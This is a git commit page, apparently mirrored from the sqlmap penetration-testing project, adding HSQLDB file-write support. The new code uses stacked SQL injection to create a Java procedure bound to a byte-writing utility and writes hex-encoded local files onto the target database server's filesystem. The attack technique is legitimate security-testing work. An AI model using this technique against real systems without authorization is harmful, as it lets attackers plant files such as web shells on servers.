mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 09:36:35 +03:00
HSQLDB write file support (#4379)
* Make asterisk work with --csrf-token option * add --file-write support in HSQLDB Co-authored-by: tree <chtpt@treedeMacBook-Pro.local>
This commit is contained in:
parent
231c3da057
commit
babe52eb10
|
@ -5,6 +5,12 @@ Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from lib.core.common import randomStr
|
||||||
|
from lib.core.data import kb
|
||||||
|
from lib.core.data import logger
|
||||||
|
from lib.core.decorators import stackedmethod
|
||||||
|
from lib.core.enums import PLACE
|
||||||
|
from lib.request import inject
|
||||||
from lib.core.exception import SqlmapUnsupportedFeatureException
|
from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||||
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||||||
|
|
||||||
|
@ -13,6 +19,45 @@ class Filesystem(GenericFilesystem):
|
||||||
errMsg = "on HSQLDB it is not possible to read files"
|
errMsg = "on HSQLDB it is not possible to read files"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
||||||
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
@stackedmethod
|
||||||
errMsg = "on HSQLDB it is not possible to write files"
|
def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
|
||||||
|
funcName = randomStr()
|
||||||
|
MAX_BYTES = 2 ** 20
|
||||||
|
|
||||||
|
debugMsg = "creating a Java Language Procedure '%s'" % funcName
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
|
addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, MAX_BYTES)
|
||||||
|
addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "
|
||||||
|
addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"
|
||||||
|
inject.goStacked(addFuncQuery)
|
||||||
|
|
||||||
|
logger.debug("encoding file to its hexadecimal string value")
|
||||||
|
|
||||||
|
fcEncodedList = self.fileEncode(localFile, "hex", True)
|
||||||
|
fcEncodedStr = fcEncodedList[0][2:]
|
||||||
|
fcEncodedStrLen = len(fcEncodedStr)
|
||||||
|
|
||||||
|
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
|
||||||
|
warnMsg = "the injection is on a GET parameter and the file "
|
||||||
|
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
|
||||||
|
warnMsg += "bytes, this might cause errors in the file "
|
||||||
|
warnMsg += "writing process"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
|
# http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures
|
||||||
|
invokeQuery = "call %s('%s', cast ('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, MAX_BYTES)
|
||||||
|
inject.goStacked(invokeQuery)
|
||||||
|
|
||||||
|
logger.debug("removing procedure %s from DB" % funcName)
|
||||||
|
delQuery = "DELETE PROCEDURE " + funcName
|
||||||
|
inject.goStacked(delQuery)
|
||||||
|
|
||||||
|
message = "the local file '%s' has been successfully written on the back-end DBMS" % localFile
|
||||||
|
message += "file system ('%s')" % remoteFile
|
||||||
|
logger.info(message)
|
||||||
|
|
||||||
|
|
|
@ -144,3 +144,13 @@ class Fingerprint(GenericFingerprint):
|
||||||
def getHostname(self):
|
def getHostname(self):
|
||||||
warnMsg = "on HSQLDB it is not possible to enumerate the hostname"
|
warnMsg = "on HSQLDB it is not possible to enumerate the hostname"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
|
||||||
|
def checkDbmsOs(self, detailed=False):
|
||||||
|
if Backend.getOs():
|
||||||
|
infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
|
||||||
|
logger.info(infoMsg)
|
||||||
|
else:
|
||||||
|
self.userChooseDbmsOs()
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue
Block a user